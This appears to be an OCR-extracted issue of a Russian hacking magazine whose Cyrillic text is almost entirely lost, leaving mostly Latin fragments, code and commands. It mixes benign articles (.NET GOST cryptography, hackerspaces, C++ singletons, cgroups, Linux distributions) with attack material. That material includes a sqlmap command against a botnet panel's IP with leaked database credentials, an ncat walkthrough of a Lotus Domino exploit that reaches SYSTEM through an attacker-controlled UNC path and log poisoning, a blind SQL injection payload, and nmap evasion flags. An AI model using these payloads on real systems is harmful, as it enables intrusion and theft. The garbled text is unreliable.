findrep_sub2.php, , id
. sqlmap
, SQL- (sqlmap.
sourceforge.net):
sqlmap.py -u "http://92.241.1.1/frmcp1/frm_findrep_sub2.
php?id=1" --file-read=/var/www/frmcp1/config.php --tor
<?php
# Database
define('DB_SERVER', 'localhost');
define('DB_NAME', 'spyxz');
define('DB_USER', 'admin');
define('DB_PASSWORD', 'SpyEye2db');
# Admin
define('ADMIN_PASSWORD', 'r0t0wVr34xzbdQH');
?>
! !
, SQL-
, .
.
,
. ,
, SpyEye
( SpyEye_b0t.pl). C&C
SpyEye
Tracker (spyeyetracker.abuse.ch). ,
SpyEye. -
, ,
. !
, Google Dork?
.
:
intitle:"SYN 1" "Please, enter password"
intitle:"CN" "Your JavaScript is turned off. Please, enable
your JS"
intitle:"SYN" "Your JavaScript is turned off. Please, enable
your JS"
"Please, enter password:" inurl:"frm_auth.php"
intitle:"FRMCP"
"index of /SpyEye/"
Google Dorks
:
http://trylook.ru/frmcp1/
http://212.36.9.59/adm/frmcp/
http://zerocrown.webcindario.com/
http://alaggaer.ans1.rock21.us/SpyEye/main/
http://92.241.165.228/SpyEyeCollector/
, ,
92.241.165.228 ,
:
...
[FOUND] http://92.241.165.228/config.ini
[FOUND] http://92.241.165.228/error.log
[FOUND] http://92.241.165.228/frm_findrep_sub2.php
[FOUND] http://92.241.165.228/mod_perlre.php
[FOUND] http://92.241.165.228/frm_settings.php
.....
[FOUND] http://92.241.165.228/SpyEyeCollector/configs/
sec.config
.....
SpyEye (sec.config):
...
listening port for logs = "53"
mysql username = "root"
mysql password = "samsung"
...
!
(root:samsung). .
?
, trylook.ru/frmcp1.
:
....
[FOUND]
[FOUND]
[FOUND]
[FOUND]
...
[FOUND]
...
http://trylook.ru/frmcp1/css/
http://trylook.ru/frmcp1/js/
http://trylook.ru/frmcp1/config.ini
http://trylook.ru/frmcp1/error.log
http://trylook.ru/frmcp1/installer/
, SpyEye?
,
. , , ,
.
,
- .
.
SpyEye? ,
.
. z
Lotus,
LOTUS DOMINO CONTROLLER
INFO
IBM Lotus
Domino Server
IBM Lotus
Software,
IBM Lotus
Notes.
WWW
www.zerodayinitiative.com ZDI;
www.ibm.com/software/ru/lotus/ IBM
Lotus Software;
bugtraq.ru BugTraq;
dj.navexpress.com
DJ Java Decompiler.
, ,
,
.
.
.
IBM,
.
, , Lotus.
. . Lotus
: , , . . ,
,
.
, ,
, .
Lotus
. :)
- , ,
names.nsf -.
, , Lotus
8.5.2FP2. , exploit-db.com
.
BugTraq, ZDI, IBM c security- .
, , ,
. ,
, .
,
- ,
. :)
CVE-2011-1519
,
,
( , ). , ZDI ZDI-11-110,
0day ( ). :
Lotus Domino Server
Controller. .
, TCP- 2050.
COOKIEFILE,
.
.
UNC,
. ,
SYSTEM.
:
COOKIEFILE
, \\evilhost\password_cookie_file,
.
, ,
.
.
, , 2050. , Lotus .
.
, .
, , ,
nmap.
Lotus-,
, ,
.
:
socket:reconnect_ssl()
...
socket:send("#API\n")
socket:send( ("#UI %s,%s\n"):format(user,pass) )
socket:receive_lines(1)
socket:send("#EXIT\n")
...
, Lotus-
: SSL-,
#. ,
admin pass
#UI admin,pass. , , nmap
COOKIEFILE . ,
, #COOKIEFILE \\evil\
file. , ,
( ,
).
-
. ,
Java, IDA Pro, - . DJ decompiler (members.
.
:
/* */
do{
// ReadFromUser
int i = ReadFromUser();
...
if(i == 6) { // #APPLET
appletConnection = true;
continue;
}
...
userinfo = UserManager.findUser(usr);
if(userinfo == null) {
// ... !
WriteToUser("NOT_REG_ADMIN");
continue;
}
...
if(!appletConnection)
// #APPLET,
flag=vrfyPwd.verifyUserPassword(pwd,userinfo.userPWD());
else // #APPLET
// COOKIE? !
flag = verifyAppletUserCookie(usr, pwd);
...
} while(true); // end loop
if(flag) // ,
// , !
...
,
#APPLET #UI #COOKIEFILE. , , ,
Ncat-
admindata.xml. , ,
( NOT_REG_ADMIN )!
.
adm,
.
verifyAppletUserCookie:
//#COOKIEFILE <cookieFilename>
if(cookieFilename == null || cookieFilename.length() == 0)
return flag;
// !
File file = new File(cookieFilename);
...
inputstreamreader = new InputStreamReader(
new FileInputStream(file),"UTF8");
...
//s7 cookieFilename
do {
if((j = s7.indexOf("<user ", j)) <= 0) break;
...
String s2 = getStringToken(s7, "user=\"", "\"", j, k);
...
String s3 = getStringToken(s7, "cookie=\"", "\"", j, k);
...
String s4 = getStringToken(s7, "address=\"", "\"", j, k);
...
if(s5.equalsIgnoreCase(s2) && s6.equalsIgnoreCase(s3)
&& appletUserAddress.equalsIgnoreCase(s4)) { //!
flag = true; break;
}
...
} while(true);
,
username, password address username, password
address cookiefile, ,
! ,
:
1. <user> .
2. username, password, address.
3. ,
.
4. ,
.
CVE-2011-1519
.
1. cookie.xml:
#APPLET , cookie .
#UI,
, #COOKIEFILE.
,
. #EXIT ,
! ? ,
LOAD,
.
, . , IBM
LOAD
, .
, nmap-, ,
. LOAD
, :
ncat --ssl targetlotus_host 2050
#API
#APPLET
#COOKIEFILE \\fileserver\public\cookie.xml
#USERADDRESS dsecrg
#UI usr,psw
VALID_USER
#EXIT
$whoami
whoamiBeginData
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Lotus\Domino\data>whoami
NT AUTHORITY\SYSTEM
C:\Lotus\Domino\data>
,
.
,
#API , API Java-,
, ncat . ,
Lotus ,
SMBRelay.
?
<user name="usr" cookie="psw" address="dsecrg">
, . ?
, -. -,
, usr .
2. ,
, \\fileserver\public\cookie.xml.
3. ncat:
ncat --ssl targetlotus_host 2050
#API
#APPLET
#COOKIEFILE \\fileserver\public\cookie.xml
#USERADDRESS dsecrg
#UI usr,psw
VALID_USER
#EXIT
SMB- ? ,
, UNC ( , ).
,
- . , IBM , : cookiefile
. . ,
- \\evil\cookie\file,
, : .\\evil\cookie\
file, UNC . , SSL-,
. . IBM! , cookiefile,
, - XML-
XML-. XML, ! , , IBM,
XML- :
<?xml version="1.0" encoding="UTF-8"?>
<user name="admin" cookie="dsecrg" address="dsecrg">
:
Bla-bla-bla<user name="admin"xXXxcookie="dsecrg"Xaddress="
dsecrg"NYA>
. :
1. cookievalues Microsoft HTTPAPI
service ( \r\n Enter):
ncat targethost 49152
GET /<user HTTP/1.0\r\n
\r\n
ncat targethost 49152
GET /user="admin"cookie="pass"address="http://site.com"
HTTP/1.0\r\n
\r\n
2. - :
#Software: Microsoft HTTP API 2.0
#Version: 1.0
#Date: 2011-08-22 09:19:16
...
2011-08-26 11:53:30 10.10.10.101 52902 10.10.9.9 47001 HTTP/1.0 GET <user 404 - NotFound
2011-08-26 11:53:30 10.10.10.101 52905 10.10.9.9 47001 HTTP/1.0 GET name="admin"cookie="pass"address="http://site.com"> 404 - NotFound
...
: IBM
<user , %20 ( ). ,
, <user ( 404 NotFound).
.
3. , -, :
ncat --ssl targetlotus_host 2050
#API
1. ,
. , ,
ARP-POISONING,
(,
Cain, DoS
- mail.ru).
2. , .
, (
). ,
, ,
,
, ,
(,
Java 6 ROP ASLR).
3. IT- ,
- ,
.
4. . .
,
. , , ,
, 99
.
.
#APPLET
#COOKIEFILE ..\..\..\windows\system32\logfiles\httperr\
httperr1.log
#USERADDRESS http://twitter/asintsov
#UI admin,pass
#EXIT
$whoami
...
NT AUTHORITY/SYSTEM
...
UNC,
- .
. -,
, , .
-, .
-, , - (
, LOAD TELL
).
admindata.xml. MD5. ,
. 4, 25 26 ,
. ,
, ! z
X-Tools
:
scarlet0
URL:
bit.ly/tIS6m2
:
Windows
URL:
3.14.by/ru/md5
:
Windows
:
cel1697i845
URL:
bit.ly/vmJ2g8
:
Windows
MSSQL
INJECTION HELPER
MD5-
MD5-
?
BarsWF World Fastest MD5 cracker.
,
MD5-
. ?
:
+ ;
+ -
;
+ ;
- MD5;
- ;
-
.
:
1.
. , Intel Core 2
Quad QX6700 (3,01 GHz)
200
!
2. Radeon:
AMD BROOK, CUDA
NVidia.
,
.
,
,
, .
, ,
?
!
Brutus hashes. New generation
!
, ,
, ,
. :-)
:
1. .
2. , .
3. .
4. ,
.
, . 6 131 066 257 801 .
PCI DSS !
PANBuster ,
, (
) .
PCI DSS,
-
PAN () .
, PANBuster
PCI QSA, ,
,
.
:
Windows, Linux, Mac OS X;
(VISA,
:
XMCO Security
Research Labs
URL:
www.xmco.fr/
panbuster.html
:
*nix/win/mac
:
TIMHOK
URL:
bit.ly/vZbhcN
:
Windows
:
YGN Ethical Hacker
Group
URL:
bit.ly/vDpEt8
:
*nix/win
:
SuRGeoNix
URL:
bit.ly/lXxLkm
:
Windows
SCREEN-
JOOMLA!
WEBSURGERY,
,
, screen-. , ,
, ,
. ,
,
. , DDMgr screen-
.
:
;
;
;
;
,
;
( ,
);
,
DDMgr
,
. ,
,
,
.
WebSurgery : -, ,
SQL, XSS,
, WAF,
DoS , -. ,
PHP- vuln.php,
SQL-.
MySQL MD5- . .
1. (Initial Request):
joomscan.pl -u http://joomla-site.com/ \
-x proxy:port
2. -
(List Configuration) : 1 32 ( MD5),
.
3. :
GET /vuln.php?id=1+and+'${List_2}'=
substring((select+password+from+admin+
limit+1),${List_1},1) HTTP/1.1
HOST: 1.2.3.4
Mifrill (mifrill@real.xakep.ru)
?
, .
,
.
.
,
, ,
,
, , , , .
, , ,
,
. ,
, ,
,
.
, ? Hackerspace
hackspace ,
,
. ,
IT.
, ,
. , ,
, ,
. .
,
.
, , . -
,
do it yourself
( ). , -
{ neuron }
.
,
. , .
,
,
.
, ,
.
:).
C-Base. !
,
, ,
! ,
,
: , , ,
. ,
,
.
,
,
.
, ,
- : 3D-,
,
. ,
.
, ,
- ,
.
,
, ,
.
3050
. ,
10001500 . ,
,
.
, ,
, , ,
,
.
, ,
,
,
-
,
. ,
,
hackerspaces.org, , . ----
.
, ! .
,
.
,
, ,
Neuron
(neuronspace.ru).
. ,
FOSS Labs .
:
, ,
, -. ,
Neuron
.
:
(eSage lab,
-base
NYC Resistor
: www.c-base.org.
: , .
: 300+.
: 17 .
: london.hackspace.org.uk.
: , .
: 300+.
: 5 .
: www.nycresistor.com.
: , -.
: 30+.
: $75115.
C-base
1995 .
.
.
, 2009 ,
.
.
NYC Resistor
. 2008 .
), (Fairwaves, )
(eSage lab).
.
. , ,
,
,
.
, , , ,
, .
CCC ,
, ,
. CCC
, .
,
,
. ,
, C-base .
, .
, , .
. ,
, ,
, - , ... ,
:). ,
, .
Neuron
,
.
. ,
.
,
- , , .
.
.
? .
,
.
,
?
. ,
(
3D-). Neuron
, ,
. ,
Software Defined Radio,
.
WiMAX GSM. ,
,
.
3D-. ,
,
.
Kiberpipa
Metalab
: www.kiberpipa.org.
: , .
: 20 40 ,
.
: .
: www.metalab.at.
: , .
: 130+.
: 20 .
. , 2001
, ,
-.
. 2006 . Metalab
.
,
neuronspace.ru.
,
,
Arduino. , ,
! ,
1517 .
, , , :
. , 15 ,
, 150,
.
, ,
. , Neuron,
, .
,
!
, ,
, , (,
;
).
,
! HackSpace Saint-Petersburg, -
.
- .
, .
: -
3D-, ,
, ,
3D-
.
,
.
, , ,
(hackspace-spb.ru).
, , ?
?
,
(po@kumekay.
com). , :
. , .
, , .
-
, (
29 . .
Mifrill): , -
.
.
40 .
. : ,
, .
, ,
.
,
,
, . ,
,
. ,
,
. ,
( )
. ,
,
C-Base, , ,
NYC Resistor
. , , , ,
.
:
$50100,
(, , ;
1030 ). ,
,
- ,
,
.
, , ,
.
,
,
.
, .
?
? .
.
-
NYC Resistor.
, , MakerBot, 3D-.
30 .
. ,
. -
NYC Resistor :
,
, . ,
. :)
,
, ,
. ,
,
200300 -
. , ,
,
,
.
(, -
, ), .
,
,
, ,
- .
, C-Base 300 .
,
. C-base
.
, ,
, .
, ,
Space Foundation, -
. ,
,
(Space Foundation , ),
,
,
,
. ,
, .
Neuron.
100 .
120 .
( ),
.
: . , ,
. .
:).
6
, 2 . .
Neuron
. ,
. , ,
,
.
,
.
, ,
HackSpace-SPb
. ,
,
,
. z
MALWARE
, Stuxnet
.
IDA
Stuxnet,
,
.
WIN32/DUQU:
STUXNET
,
RSS- .
Stuxnet
. , Symantec,
, - , - Duqu. ,
research Stuxnet. , Duqu
Stuxnet , ,
, Stuxnet. =)
,
Cryptography and System Security (CrySyS). Duqu, Stuxnet,
. , CrySyS
-
Duqu , .
. 1. !
.2. .
Duqu ,
.
, .
, , Duqu, Stuxnet,
.
Duqu :
0) doc-, , CVE-2011-3402.
1) - win32k.sys.
2) -, .
3) .
4)
services.exe Duqu . .
- Duqu Stuxnet.
, -, .
,
Duqu .
, -
. 4.
. 5.
Stuxnet
cmi4432.sys,
, C-Media Electronics Inc. ,
, VeriSign
2012 ( 1).
. Duqu
. ,
.
DUQU
,
, 3.
, .
,
, . ,
Duqu , .
4.
,
,
Stuxnet. , , ,
,
. 5 Stuxnet, 6 Duqu.
.3.
(,
): , ,
, , , , , , .
, .
, ,
Duqu Stuxnet.
,
,
. ,
,
Stuxnet, Duqu.
MALWARE
, .
?
Win32/Duqu, , . , ,
.
, Duqu
,
, (
, ).
. , main.dll (
Duqu),
UTC-. 7 ,
.
.
Duqu: the precursor to the next Stuxnet ,
36 ,
. ,
( 8).
, ,
, , -
. 7.
. 8.
. 9.
. 10.
14.10.2011
19.10.2011
1.11.2011
3.11.2011
4.11.2011
CrySyS
.
Duqu: the precursor to the next Stuxnet,
Win32/Duqu.
(, ,
).
(CVE2011-3402),
,
CrySyS.
CVE-2011-3402
Microsoft
Active Protections Program
(MAPP).
CrySyS, Symantec
Microsoft.
,
,
.
Stuxnet
Duqu
SCADA-
1-day
0-day
RPC-
remote
local
.
, ,
36 , 30. , 11.08.2011,
7:50:01 36
, 9,
18.08.2011, 7:29:07 30 10.
( )
Visual C++
ATL
UPX
RpcHandler_1 ;
RpcHandler_2
;
RpcHandler_3 ;
RpcHandler_4
CreateProcess();
RpcHandler_5 (,
);
RpcHandler_6 ;
RpcHandler_7 .
,
, 12.
RPC-
.
. 12. ,
Stuxnet 80 :),
?.
,
. ,
. , Stuxnet, Duqu
. ,
Duqu,
, , .
-,
.
, , ,
Duqu . z
MALWARE
(http://group.xakep.ru)
:
bootkit test
BITDEFENDER, ESET NOD32, F-SECURE,
OUTPOST SECURITY, RISING
, MBR, :
MS-DOS,
Doom 2
.
.
?
? - !
: bootkit test
Sinowal NOD
MBR Boot- :
MBR, Sinowal
: GHODOW
,
, Sinowal,
.
, Sinowal, , ,
. Win32/Ghodow.
NAD ( ESET).
Ghodow.
MBR
MALWARE
(http://group.xakep.ru)
BitDefender :
.
, BitDefender
Rescue Mode, *nix- , .
: BitDefender .
NOD32 :
MBR- 0.
, , .
MBR,
.
, quick/
- .
,
, , ,
.
Hiew ,
0x200 0x200 0x1000 . , , , ,
MBR. ,
BitDefender, Rising ,
. ,
, , .
, MBR
. , ,
MBR, , .
NTFS- ( , -)
.
-
, MBR.
BitDefender 2012
?
. , , .
, , : ;). z
BitDefender,
BitDefender 2012
Preview
UNIXOID
112
ANDROID
CyanogenMod,
- ,
2
Android-.
, firmware.
,
,
.
,
,
,
, 3G- ..
Android-
.
88
.NET-
-.
Microsoft . -.
SYN\ACK
118
?
, , ,
.
UNIXOID
102
,
. opensource.
FERRUM
126
- NAS'
Pentium
IDE- sux! , 12
NAS' .
SYN\ACK
122
100 . .
?
132
LOOP
,
,
. .
.NET
.NET FRAMEWORK
,
.
,
,
,
.
,
,
().
INFO
Strong name
,
, ,
WWW
http://gacbrowser.
blogspot.com/
GAC
Browser.
bit.ly/uyxZs5
,
28147-89 C#.
DVD
.
, .NET Framework,
System.Security.Cryptography,
, .NET Framework
CLR
.
.NET,
.
SYSTEM.SECURITY.CRYPTOGRAPHY
, , .NET Framework
System.Security.Cryptography,
:
,
, - . .;
, . .;
X.509 XML-
(XMLSignature).
,
, (. 1). ,
SymmetricAlgorithm,
AsymmetricAlgorithm, HashAlgorithm
KeyedHashAlgorithm ,
-. .NET
, ,
. 28147-89 ,
, ,
.
SYMMETRICALGORITHM
, .NET Framework
SymmetricAlgorithm. MSDN,
:
public
public
public
public
,
,
. , ICryptoTransform .
MSDN . ,
ICryptoTransform
. :
int TransformBlock(byte[] inputBuffer,
int inputOffset, int inputCount,
byte[] outputBuffer, int outputOffset);
byte[] TransformFinalBlock(byte[] inputBuffer,
int inputOffset, int inputCount);
, . MSDN
, , SymmetricAlgorithm, ,
(CBC).
, 28147-89
, CBC . ,
.NET Framework , ,
(CFB).
, .
28147-89
, 28147-89
ECB ( )
, .NET Framework CFB.
GostCfb, .
CFB ( )
.NET Framework
using System.Security.Cryptography;

namespace Gost
{
    // Class skeleton: the method bodies are omitted at this stage.
    public class GostCfb : SymmetricAlgorithm
    {
        public GostCfb(){}
        public override ICryptoTransform CreateDecryptor
        (
            byte[] rgbKey,
            byte[] rgbIV
        ){}
        public override ICryptoTransform CreateDecryptor()
        {}
        public override ICryptoTransform CreateEncryptor
        (
            byte[] rgbKey,
            byte[] rgbIV
        ){}
        public override ICryptoTransform CreateEncryptor()
        {}
        public override void GenerateIV(){}
        public override void GenerateKey(){ }
    }
}
.
private static byte[] GetRandomBytes(int bytesCount)
private static void Gamm(byte[] input,
byte[] gamma, byte[] output)
, .NET
FRAMEWORK ,
,
(CFB)
OID
XOR . ,
, .
GetRandomBytes
GenerateIV GenerateKey: IVValue
KeyValue,
.
. , ,
64 256 .
- ,
.
(, ),
(, ).
, .
OID (object identifier),
. OID ,
(,
) ,
. OID
(arcs), :
"{joint-iso-itu-t(2) ds(5) attributeType(4)
distinguishedName(49)}"
"2.5.4.49"
public GostCfb()
{
LegalBlockSizesValue = new[]
{ new KeySizes(64, 64, 0) };
LegalKeySizesValue = new[]
{ new KeySizes(256, 256, 0) };
BlockSizeValue = 64;
KeySizeValue = 256;
}
CreateEncryptor
CreateDecryptor, GostCfb
, ICryptoTransform.
private sealed class GostCfbTransformEncr:ICryptoTransform
{}
private sealed class GostCfbTransformDecr:ICryptoTransform
{}
(
). ASN.1 ,
,
-
.
www.oid-info.com.
ASN.1 -
,
,
. ASN.1
ITU-T, ,
.
.
GOSTCFBTRANSFORMENCR
CreateEncryptor . GostCfb.
, , , .
, ,
, ECB CFB,
,
2 ( , ).
() ,
.
OID ,
,
//
private byte[] m_Key;
// ,
//
private byte[] m_State;
//
private byte[] tmpState;
:
public int TransformBlock(...)
{
...
byte[] plainBlock = new byte[8];
int result = 0;
while(inputCount > 0)
{
//
Array.Copy(inputBuffer, inputOffset, plainBlock, 0,8);
Gost28147.Gost28147Ecb(m_State, tmpState, m_Key);
Gamm(plainBlock, tmpState, m_State);
Array.Copy(m_State, 0, outputBuffer, outputOffset, 8);
inputCount -= 8;
inputOffset += 8;
outputOffset += 8;
result += 8;
}
...
return result;
}
,
. , ,
XOR. , ,
.
TransformFinalBlock
TransformBlock, .
,
,
.
GostCfbTransformDecr
GostCfbTransformEncr,
CFB, , ,
( ,
).
KEYEDHASHALGORITHM
KeyedHashAlgorithm .
HashAlgorithm, :
protected abstract void HashCore(
byte[] array, int ibStart, int cbSize)
protected abstract byte[] HashFinal()
CLR
,
28147-89. ( 16 ,
16 ). , ,
HashAlgorithm, , ,
KeyedHashAlgorithm:
.
28147-89 GostImito.
KeyValue
HashValueSize 32, 32 .
HashCore , (
InternalTransform).
DWORD, 16-
, :
...
uint tempInH = Gost28147.Bytes2Dword(array,
(int)(ibStart + i * 8));
uint tempInL = Gost28147.Bytes2Dword(array,
(int)(ibStart + i * 8 + 4));
uint tempOutH = 0;
uint tempOutL = 0;
Gost28147.EncryptBlock16(ref tempInH, ref tempInL,
ref tempOutH, ref tempOutL,
Gost28147.P, KeyValue);
uImito ^= tempOutH;
...
(8 ) DWORD, 16-
(EncryptBlock16),
.
DWORD , -,
(XOR DWORD
, XOR ), , .
HashFinal ,
.
.NET
Framework GAC.
GAC
GAC Browser
.NET,
GAC, Global Assembly Cache (-
091
). GAC ,
. , , strong name, ,
, .
,
sn.exe, .NET
Framework. :
sn.exe -k keypair.snk
keypair.snk. Signing
Sign the assembly (.
3). . , .
GAC
gacutil, .NET Framework.
.NET,
, GAC .
:
gacutil /i < >
.NET .
machine.config, XML .
cryptographySettings,
mscorlib. Name Mapping.
:
cryptoClass,
nameEntry. , ,
.
OID -
oidMap
oidEntry.
<cryptographySettings>
  <cryptoNameMapping>
    <cryptoClasses>
      <cryptoClass GOSTCFB="Gost.GostCfb, GostAlgs, Version=1.0.0.0,Culture=ru,PublicKeyToken=9b088f4818daa492"/>
      <cryptoClass GOSTIMITO="Gost.GostImito, GostAlgs, Version=1.0.0.0,Culture=ru,PublicKeyToken=9b088f4818daa492"/>
    </cryptoClasses>
    <nameEntry name="GostImitoAlg" class="GOSTIMITO" />
    <nameEntry name="GostCfbAlg" class="GOSTCFB" />
    <nameEntry
      name="System.Security.Cryptography.KeyedHashAlgorithm"
      class="GOSTIMITO" />
    <nameEntry
      name="System.Security.Cryptography.SymmetricAlgorithm"
      class="GOSTCFB" />
  </cryptoNameMapping>
  <oidMap>
    <oidEntry OID="1.2.643.2.2.21" name="GostCfbAlg" />
    <oidEntry OID="1.2.643.2.2.22" name="GostImitoAlg" />
  </oidMap>
</cryptographySettings>
GOSTCFB GOSTIMITO,
GostCfbAlg GostCfb, GostImitoAlg
GostImito.
<nameEntry
name="System.Security.Cryptography.KeyedHashAlgorithm"
class="GOSTIMITO" />
<nameEntry
name="System.Security.Cryptography.SymmetricAlgorithm"
class="GOSTCFB" />
, GostCfb, - GostImito
(. 5). SymmetricAlgorithm.
Create GostCfbAlg .
CryptoConfig
28147-89
28147-89
,
. ,
: XOR,
2^32 11 .
(8 ) 4
. ( mod 2^32),
(SBox), .
.
31- , 32 ,
8 .
, 28147-89,
.
.
7.
KeyedHashAlgorithm.Create, .
CryptoConfig.CreateFromName,
Activator.CreateInstance
catch.
null.
oidMap OID
, CryptoConfig
OID . , MSDN , name oidEntry
( , , GostCfb),
,
nameEntry, OID .
, - , ,
machine.config. OID private machineOidHT, -private
machineNameHT CryptoConfig (. 6).
, 28147-89
CLR
- ,
CryptoStream,
Stream.
.
, ,
CryptoStream ,
CryptoStream .
.
-
.
CryptoStream
,
. ,
,
, Position - CryptoStream.
MONO PROJECT
Mono, , GAC,
. , ,
:
$ gacutil -i < >
:
$ gacutil -l
,
.NET Framework, .
- . z
(ivinside.blogspot.com)
.
,
?
, 50
, (
50 ; , ).
,
.
. ,
.
- , :
,
, .
(100 - ) / .
, y(x) = x + (100 - x) / x.
. ,
, . ;).
, , = 10,
19. ! . , ...
, .
,
, , , !
,
. , : n(k) + (n(k) - 1) + ... +
(n(k) - k + 1), k , n
. , ,
:
(2 * n(k) - k + 1) * k / 2. n(k) = 100 / k + k / 2 - 1/2,
. :) , ,
200, , 14,
.
:
tokens = []
for token in tokeniter:
    if token not in tokens:
        tokens.append(token)
tokensiter ,
, .
, tokensiter.
.
if token not in
tokens:, -
O(n*m), 1 < m < n. , , . ,
, .
:
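import random
import timeit

# Build the test data: a list of random numbers
# in the range 1 to 99999
f = []
for i in xrange(1, 20000):
    f.append(random.randrange(1, 100000))

# Variant 1: membership test against a list
def func1():
    tokens = []
    for token in f:
        if token not in tokens:
            tokens.append(token)

# Variant 2: membership test against a dictionary
def func2():
    tokensdict = {}
    i = 0
    for token in f:
        if not tokensdict.has_key(token):
            # value: the order in which the token was first seen
            tokensdict[token] = i
            i += 1

# Time one run of each variant (the measurement call is not
# preserved on the page; timeit.timeit is assumed here)
print timeit.timeit(func1, number=1)
print timeit.timeit(func2, number=1)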
$ python2 test.py
6.80089592934
0.0135538578033
600 .
O(n),
.
.
O(log n).
.
?
Linux.
value , , pid.
CPU, ,
4-
, 100%, 400%.
cgroups,
.
.
cgroups:
$ yaourt -S libcgroup
,
:
group default {
perm {
task {
uid = root;
gid = root; }
admin {
uid = root;
gid = root; }}
cpu {
cpu.shares = 10; }}
1
, - .
: ) , )
, .
2
( ).
, Python.
group daemons/tomcat {
perm {
task {
uid = root;
gid = root; }
admin {
uid = root;
gid = root; }}
cpu {
cpu.shares = 40; }}
3
, URL (
URL), N
. N,
, 10.
.
threading, eventlet, gevent, Twisted .
4
Oracle
. , ,
.
group daemons/postgres {
perm {
task {
uid = root;
gid = root; }
admin {
uid = root;
gid = root; }}
cpu {
cpu.shares = 50; }}
mount {
cpu = /mnt/cgroups/cpu;
cpuacct = /mnt/cgroups/cpu;
}
,
: daemons/tomcat 40 %, daemons/
postgres 50 %, default 10 %. . /etc/cgrules.conf:
<user>       <controllers>   <destination>
*:tomcat     cpu             daemons/tomcat/
*:postgres   cpu             daemons/postgres/
*            cpu             default/
filtered , .
:
;
;
;
(
, ).
:
IP- MAC- ( ,
/, ):
tomcat daemons/
tomcat, postgres daemons/postgres, default.
, , + ,
;
, .
. ,
/ filtered.
?
nmap, :
--max-rate 50
50 /;
-f ;
-g 88 ;
--data-length 50 50
.
/. z
>> coding
deeonis (deeonis@gmail.com)
-
,
-
.
, ,
,
.
,
, Singleton.
,
, .
, Singleton. , , - .
, -
Windows, user mode - , . ,
, ini-
. , ,
,
. Save,
. , ,
?
,
.
.
.
, ,
, gSettings,
. CSettings. , ,
, .
.
class CSettings
{
public:
    void getSettings() {...};
    //...
};
//
CSettings gSettings;
-,
.
CSettings gSettings. , , ,
,
, , gSettings
. -,
, .
gSettings, ,
,
.
, ,
. -, CSettings, ,
, , gSettings
. ,
, , .
- :
static
.
class CSettings
{
public:
    static void getSettings() {...};
    //...
};
//
CSingleton;
class CSettings
{
private:
    CSettings();
    static CSettings* m_instance;
public:
    static CSettings* getInstance()
    {
        if (m_instance == 0)
            m_instance = new CSettings();
        return m_instance;
    }
    void getSettings() {...};
    //...
};
//
CSettings* CSettings::m_instance = 0;
// CSettings
CSettings::getInstance()->getSettings();
CSettings::getSettings();
, , .
,
, , . ,
:
.
- . , ,
ini-. ,
, , -
CSettings , CSettings
.
, , CSettings
. , new.
-
getInstance().
CSettings
m_instance, ,
,
. , 100 %- ,
,
, ,
.
, ,
,
. ,
. ,
, .
, C++ .
, . , private,
.
, .
.
( ) .
.
, . .
CSingleton,
,
getInstance(), . ,
,
( ,
), , -
, getInstance
. .
CSingleton
template <class T>
class CSingleton
{
public:
virtual ~CSingleton() {};
static T* getInstance()
{
if (m_instance == 0)
m_instance = new T();
return m_instance;
}
protected:
CSingleton() {};
static T* m_instance;
};
// CSettings
class CSettings : public CSingleton<CSettings>
{
private:
    CSettings();
protected:
    friend class CSingleton<CSettings>;
public:
    static void getSettings() {...};
    //...
};
CSingleton ,
getInstance . , , ,
CSettings - ,
new.
, C++ friend,
. -
.
,
. ,
, CSingleton
, .
CSingleton, .
Wikipedia
,
CSettings. , 1
getInstance. , m_instance
, , CSettings , .
2, getInstance,
, , m_instance.
1, ,
CSettings , m_instance.
.
, , ,
.
, . C++
, API- . Windows CSingleton,
, :
CSingleton
template <class T>
class CSingleton{
public:
virtual ~CSingleton() {};
static T* getInstance()
{
EnterCriticalSection(...);
if (m_instance == 0)
m_instance = new T();
LeaveCriticalSection(...);
return m_instance;
}
protected:
CSingleton() {};
static T* m_instance;
};
,
CSettings, .
, .
. , , ,
, .
, -. z
UNIXOID
grinder (grinder@tux.in.ua)
LINUX
,
:
,
,
,
.
.
.
INFO
Sabayon
.
Sabayon emerge
,
equo,
.
.config Calculate
Linux
1560 ,
866,
Sabayon
2625 1250
.
Calculate
Linux
.
Linux Mint
.
PCLinuxOS
x64.
, Mageia
Mandriva.
GENTOO
Gentoo,
, ,
:
.
,
( USE), ,
.
Sabayon 7
: sabayon.org
: GPL
: i686, x86_64
: Intel Pentium II, 512 M RAM, 6
Kernel 3.0, Glibc 2.13, Udev 171, X.org 1.10.4, GNOME 3.2, KDE 4.7,
LibreOffice.Org 3.4.3
Sabayon Gentoo,
Distrowatch.com .
Fabio Erculiani. ,
, Gentoo ,
, .
(
) Gentoo.
, 5.4
ServerBase .
,
SpinBase:
: KDE, GNOME;
: XFce, LXDE, Enlightenment SpinBase/
OpenVZ ( OpenVZ).
,
CoreCDX, SpinBase
(Fluxbox). 4.1
Molecule.
DAILY . ,
( isohybrid).
Gentoo, Portage,
. , Sabayon
Entropy. , , ,
Gentoo ,
. equo:
, Sabayon ,
, .
,
. 6 /etc/make.conf . ,
, ,
. make.conf
.
Live-
. (
XBMC). Anaconda,
. ,
. , , ,
. , , (
man).
Sabayon , ,
. ,
wide-, 4:3 ,
GNOME , root
.
. , .
( ATI NVidia)
. :
,
. . , . .config Sabayon
, Calculate Linux ( Calculate 1560 ,
866, Sabayon 2625 1250 ).
, . /etc/skel
( 14 ),
.
,
,
Gentoo CL.
# equo install mc
equo , , ,
apt-get: , , ,
smart- ( ),
.
Magneto Store equo ( Magneto). Store
( ) ,
.
(USE-, , . .) ,
Portage. : emerge ,
equo ( Package Setting),
- . ,
, equo . , , , . Sabayon
.
Calculate Linux ( ),
DISTROWATCH.COM
( 06.11.2011)
1. Mint 2155
2. Ubuntu 2108
3. Fedora 1686
4. Debian 1318
5. openSUSE 1290
6. Arch 1222
7. PCLinuxOS 1032
8. CentOS 916
9. Puppy 866
10. Mandriva 708
11. Mageia 627
12. Lubuntu 612
13. Scientific 575
14. Zorin 563
15. Slackware 563
16. Chakra 563
17. Sabayon 557
18. FreeBSD 490
19. Bodhi 478
20. Gentoo 453
: calculate-linux.ru
: GPL
: i686, x86_64
: Intel Pentium II, 128 (XFce) 512 (KDE) M
RAM, 46
Kernel 3.0.4, Glibc 2.23.4, Udev 164, X.org 1.10.4, GNOME 2.32.1, KDE
4.7.1, LibreOffice.Org 3.3.4
, .
: (CDS Directory
Server) KDE- (CLD) , (LDAP, mail, ftp,
jabber, , . .). ,
. ,
, : GNOME (CLDG), XFce (CLDX), CMC (Calculate
